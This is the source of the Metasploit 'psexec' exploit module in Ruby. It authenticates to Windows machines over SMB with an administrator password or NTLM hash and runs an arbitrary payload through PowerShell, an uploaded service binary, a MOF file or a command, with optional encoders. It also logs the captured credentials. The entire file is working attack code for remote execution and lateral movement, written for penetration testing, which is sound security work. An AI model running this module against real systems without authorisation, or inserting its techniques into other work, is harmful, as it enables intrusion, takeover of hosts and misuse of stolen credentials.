##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
#  Local Security Settings >
#   Local Policies >
#    Security Options >
#     Network Access: Sharing and security model for local accounts

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::SMB::Client::Psexec
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Auxiliary::Report
  include Msf::OptionalSession::SMB

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Windows Authenticated User Code Execution',
      'Description'    => %q{
          This module uses a valid administrator username and password (or
        password hash) to execute an arbitrary payload. This module is similar
        to the "psexec" utility provided by SysInternals. This module is now able
        to clean up after itself. The service created by this tool uses a randomly
        chosen name and description.
      },
      'Author'         =>
        [
          'hdm',
          'Royce Davis <rdavis[at]accuvant.com>', # (@R3dy__) PSExec command module
          'RageLtMan <rageltman[at]sempervictus>' # PSH exploit, libs, encoders
        ],
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'WfsDelay'     => 10,
          'EXITFUNC' => 'thread'
        },
      'References'     =>
        [
          [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
          [ 'OSVDB', '3106'],
          [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ],
          [ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ],
          [ 'URL', 'http://sourceforge.net/projects/smbexec/' ]
        ],
      'Payload'        =>
        {
          'Space'        => 3072,
          'DisableNops'  => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          [ 'Native upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          [ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          [ 'Command', { 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 8191 } } ]
        ],
      'DefaultTarget'  => 0,
      # For the CVE, PsExec was first released around February or March 2001
      'DisclosureDate' => '1999-01-01'
    ))

    register_options(
      [
        OptString.new('SMBSHARE', [false, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", ''], aliases: ['SHARE'])
      ])

    register_advanced_options(
      [
        OptBool.new('ALLOW_GUEST', [true, 'Keep trying if only given guest access', false]),
        OptString.new('SERVICE_FILENAME', [false, 'Filename to to be used on target for the service binary', nil]),
        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
        OptString.new('SERVICE_STUB_ENCODER', [false, 'Encoder to use around the service registering stub', nil])
      ])
  end

  def native_upload_with_workaround(smbshare)
    service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
    service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''

    # Avoid implementing NTLMSSP on Windows XP
    # https://seclists.org/metasploit/2009/q1/6
    if smb_peer_os == "Windows 5.1"
      connect(versions: [1])
      smb_login
    end
    native_upload(smbshare, service_filename, service_encoder)
  end

  def validate_service_stub_encoder!
    service_encoder = datastore['SERVICE_STUB_ENCODER']
    return if service_encoder.nil? || service_encoder.empty?

    encoder = framework.encoders[service_encoder]
    if encoder.nil?
      raise Msf::OptionValidateError.new(
        {
          'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}"
        }
      )
    end
  end

  def exploit
    validate_service_stub_encoder!

    # automatically select an SMB share unless one is explicitly specified
    if datastore['SMBSHARE'] && !datastore['SMBSHARE'].blank?
      smbshare = datastore['SMBSHARE']
    elsif target.name == 'Command'
      smbshare = 'C$'
    else
      smbshare = 'ADMIN$'
    end

    create_simple_smb_client!

    case target.name
    when 'Automatic'
      if powershell_installed?(smbshare, datastore['PSH_PATH'])
        print_status('Selecting PowerShell target')
        execute_powershell_payload
      else
        print_status('Selecting native target')
        native_upload_with_workaround(smbshare)
      end
    when 'PowerShell'
      execute_powershell_payload
    when 'Native upload'
      native_upload_with_workaround(smbshare)
    when 'MOF upload'
      mof_upload(smbshare)
    when 'Command'
      execute_command_payload(smbshare)
    end

    handler
    disconnect
  end

  def report_auth
    service_data = {
        address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
        port: datastore['RPORT'],
        service_name: 'smb',
        protocol: 'tcp',
        workspace_id: myworkspace_id
    }

    credential_data = {
        origin_type: :service,
        module_fullname: self.fullname,
        private_data: datastore['SMBPass'],
        username: datastore['SMBUser'].downcase
    }

    if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
      credential_data.merge!({
        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
        realm_value: datastore['SMBDomain']
       })
    end

    if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
      credential_data.merge!({:private_type => :ntlm_hash})
    else
      credential_data.merge!({:private_type => :password})
    end

    credential_data.merge!(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
        access_level: 'Admin',
        core: credential_core,
        last_attempted_at: DateTime.now,
        status: Metasploit::Model::Login::Status::SUCCESSFUL
    }

    login_data.merge!(service_data)
    create_credential_login(login_data)
  end

  def create_simple_smb_client!
    if session
      print_status("Using existing session #{session.sid}")
      client = session.client
      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)

    else
      print_status('Connecting to the server...')
      connect

      print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
      smb_login

      if !simple.client.auth_user && !datastore['ALLOW_GUEST']
        print_line
        print_error(
          'FAILED! The remote host has only provided us with Guest privileges. ' \
            'Please make sure that the correct username and password have been provided. ' \
            'Windows XP systems that are not part of a domain will only provide Guest privileges ' \
            'to network logins by default.'
        )
        print_line
        disconnect
        return
      end

      unless datastore['SMBUser'].to_s.strip.empty?
        report_auth
      end

    end
  end
end
